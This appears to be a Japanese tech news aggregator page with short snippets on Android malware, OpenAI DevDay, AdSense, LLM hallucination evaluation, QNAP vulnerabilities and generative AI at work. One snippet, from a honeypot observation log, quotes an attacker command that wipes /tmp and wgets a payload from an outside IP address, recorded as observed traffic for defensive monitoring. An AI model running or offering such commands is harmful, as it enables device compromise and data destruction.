Android 13のセキュリティ機能「制限付き設定」を回避するマルウェアに警戒を
ThreatFabricは11月6日(現地時間)、「Bypassing Android 13 Restrictions with SecuriDropper」において、GoogleがAndroid 13で導入したセキュリティ対策の「制限付き設定(Restricted Settings)」を回避するマルウェア「SecuriDropper」の仕組みについて解説した。SecuriDropperは感染したデバイスに追加のマルウェアをインストールすることを目的としたドロッパ型マルウェアとされる。 Bypassing Android 13 Restrictions with SecuriDropper Android 13では、非公式アプリなどサイドロードされたアプリケーションの権限に制限を加える「制限付き設定」により、マルウェアに悪用されることの多いアクセシビリティと通知リスナのアクセス権の取得を防
OpenAI発表まとめ カスタ厶版「ChatGPT」作成機能、128Kの長文入力に対応した「GPT-4 Turbo」など盛りだくさん
OpenAIは11月6日(現地時間)、米カリフォルニア州サンフランシスコで初の対面による開発者会議「OpenAI DevDay」を開催。冒頭のサム・アルトマンCEOによる基調講演では多くのプロダクトが発表された。その内容をダイジェストでお伝えしよう。 目玉は「GPT-4」に続く最新の大規模言語モデル「GPT-4 Turbo」。 同モデルは従来のものよりあらゆる面で高性能なのはもちろん、2023年4月までの世界情勢を把握しているため最新の情報に関する質問にも回答可能になっている。 また、従来の16倍となる128Kの入力ウィンドウを持つため、1つのプロンプトに300ページ以上のテキストを入力することができる。 さらに、複数の関数を呼び出す機能の向上、回答をJSONフォーマットで出力する「JSON mode」、「シード値」の導入による回答の再現性の向上など、様々な改善がなされている。 GPT-4
GoogleがAdsense広告を2024年に「クリック単価」から「インプレッション単価」に移行へ
広告配信サービス「Google Adsense」が2024年初頭に、従来のクリック単価(CPC)型からインプレッション単価(CPM)型に切り替わる予定であることが明らかになりました。 Updates to how publishers monetize with AdSense https://blog.google/products/adsense/evolving-how-publishers-monetize-with-adsense/ Google AdSense moving to per-impression payments in 2024 https://9to5google.com/2023/11/02/google-adsense-payments-2024/ Google AdsenseはGoogleが2003年から展開している広告配信サービスで、パブリッシャーには年
OpenAI初デベロッパーイベントで発表された11のこと
OpenAI初デベロッパーイベントで発表された11のこと2023.11.07 12:306,476 Maxwell Zeff - Gizmodo US [原文] ( そうこ ) ChatGPTで知られるOpenAIが、自社初となるデベロッパーカンファレンス「DevDay」を開催しました。CEOのサム・アルトマン氏がステージに立った基調講演では、現状報告や最新モデルが発表されました(こちらの記事もどうぞ)。 アルトマン氏いわく、現在200万人の開発者、100万人の毎週アクティブユーザーを抱え、フォーチュン500掲載企業の92%が導入しているというOpenAIプロダクト。「世界最先端かつ最も広く使われているAIプラットフォーム」だと、同社プロダクトを自負。 以下、DevDayのメインとなった発表された11のことを紹介します。 新モデルChatGPT-4 Turbo新モデル「GPT-4 Turb
OpenAI、「ChatGPT」の独自バージョンを構築可能に
UPDATE 「ChatGPT」の提供によって人工知能(AI)チャットボットを誰もが知る存在に押し上げたOpenAIは米国時間11月6日、ChatGPTの独自の特定用途バージョンをユーザーが構築できるようにすると発表した。 そうした特定用途ボットは「GPTs」と呼ばれ、プログラミングの知識がなくても構築できるという。ユーザーに必要なのは、自然な言葉による指示と追加の知識を与えた上で、画像作成やウェブ検索など、その目的を決めることだ。 「GPTsは、ChatGPTを特定用途向けにカスタマイズしたバージョンだ」と、OpenAIの最高経営責任者(CEO)であるSam Altman氏は述べた。同氏は、サンフランシスコで開催されたOpenAI DevDayでこの技術のデモを披露し、構築されたシステムに対して、同氏がアップロードした自身の講演の動画を基に、新興企業向けにアドバイスを提供するアプリを作成
大規模言語モデルが「幻覚」を引き起こすリスクを客観的に検証できるオープンソースの評価モデルをVectaraがリリース
AIが入力された内容に対して、いかにもそれっぽいように見えるいい加減な内容を出力してしまう現象を「幻覚」と呼びます。AI企業のVectaraが、オープンソースの幻覚評価モデル(HEM)を発表しました。 Measuring Hallucinations in RAG Systems - Vectara https://vectara.com/measuring-hallucinations-in-rag-systems/ 大規模言語モデルは質問に対して的確に答えることもあれば、時として学習データに含まれたいい加減な情報を出力することがあります。大規模言語モデルはあくまでも統計的に言葉を出力しているだけで、出力している内容の意味を理解しているわけではないので、何を言っているのかさっぱり分からないような回答を返してしまう可能性があり、「ユーザーの質問内容に対して、完全にありもしない内容をでっち上
【セキュリティ ニュース】QNAP製NASに複数の脆弱性 - 「クリティカル」など4件を修正(1ページ目 / 全1ページ):Security NEXT
QNAP Systemsは、同社製NASに搭載されている「OS」や提供する「アプリ」において複数の脆弱性に対処したことを明らかにした。重要度が「クリティカル」とされる脆弱性も含まれる。 現地時間11月4日にアドバイザリをリリースし、影響を受けるバージョンなどは異なるが、あわせて4件の脆弱性に対応したことを明らかにしたもの。3件についてはOS、2件についてはアプリケーションが影響を受ける。 「CVE-2023-23368」「CVE-2023-23369」は、ネットワーク経由でコマンドの実行が可能となるOSコマンドインジェクションの脆弱性。「CVE-2023-23368」は「QTS」に影響があり、「CVE-2023-23369」については「QTS」「QuTS hero」および「Multimedia Console」が対象としている。 共通脆弱性評価システム「CVSSv3.1」のベーススコアは「
Google Play、「独自のセキュリティ審査」バッジを導入 | スラド セキュリティ
Google Play に「独自のセキュリティ審査」バッジが導入され、VPN アプリを皮切りに表示が開始されている (Google Security Blog の記事、 The Register の記事、 Bleeping Computer の記事)。 新しいバッジは Google 認定ラボパートナーが実施するモバイルアプリセキュリティ評価 (MASA) により、業界標準 OWASP の基本的なセキュリティ要件 MASVS が満たされていることを示すものだ。バッジがアプリに脆弱性がないことを保証するわけではないが、開発者がユーザーの安全を保つためセキュリティとプライバシーを重視していることを示すものとなる。 既に Google Play では NordVPN や Google One、ExpressVPN をはじめとして数多くの VPN アプリの「データセーフティ」セクションにバッジが表示
2023/10/31 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ
ハニーポット(仮) 観測記録 2023/10/31分です。 特徴 共通 Spring Bootの脆弱性を狙うアクセス zgrabによるスキャン行為 /.envへのスキャン行為 Location:JP CensysInspectによるスキャン行為 .jsへのスキャン行為 /.gitへのスキャン行為 を確認しました。 Location:US GPONルータの脆弱性を狙うアクセス Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス TP-Link製品の脆弱性(CVE-2023-1389)を狙うアクセス CensysInspectによるスキャン行為 curlによるスキャン行為 .jsへのスキャン行為 を確認しました。 /shellに対する以下のアクセスを確認しました。 cd /tmp; rm -rf *; wget 192.210.162.147/arm
「生成AIを仕事で使い倒す人たち」に取材して回ったら「自分の10年後の失業」が見えてしまった
ChatGPTの発表から、1年が経過しようとしています。 熱狂は徐々に醒め、現在の利用状況はLINEの調査によると、全体の5%程度。*1 その中でも、仕事で積極的に利用している人は、1%程度ではないかと推測します。 では、この1%の人たちはどのような方々で、どのように生成AIを仕事で使っているのか? 9月の中旬から、10月の末にかけて、私は約40名の方に取材を行いました。 そして、私は一つの確信を得ました。 それは、「私は間違いなく10年後、失業する」です。 私は間違いなく10年後、失業する なぜなら、現場での生成AI利用は、仕事によっては 「ホワイトカラーの代替」 をかなり高いレベルでできることがわかったからです。 例えば、コンサルティング。 コンサルティングには、初期の段階で、仮説構築という仕事があります。 平たく言うと、調査・提案にあたって「課題はここにあるのではないか?」というアタ
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
rinna、日本語LLM「Youri 7B」シリーズを公開。Llama 2を日本語データで継続事前学習 
「Android 14」のリリース後初となる月例セキュリティアップデートが公表/最高深刻度は「Critical」
Stability AI Japanが公開した30億パラメーターの日本語向けLLMを動かしてみた【生成AIストリーム】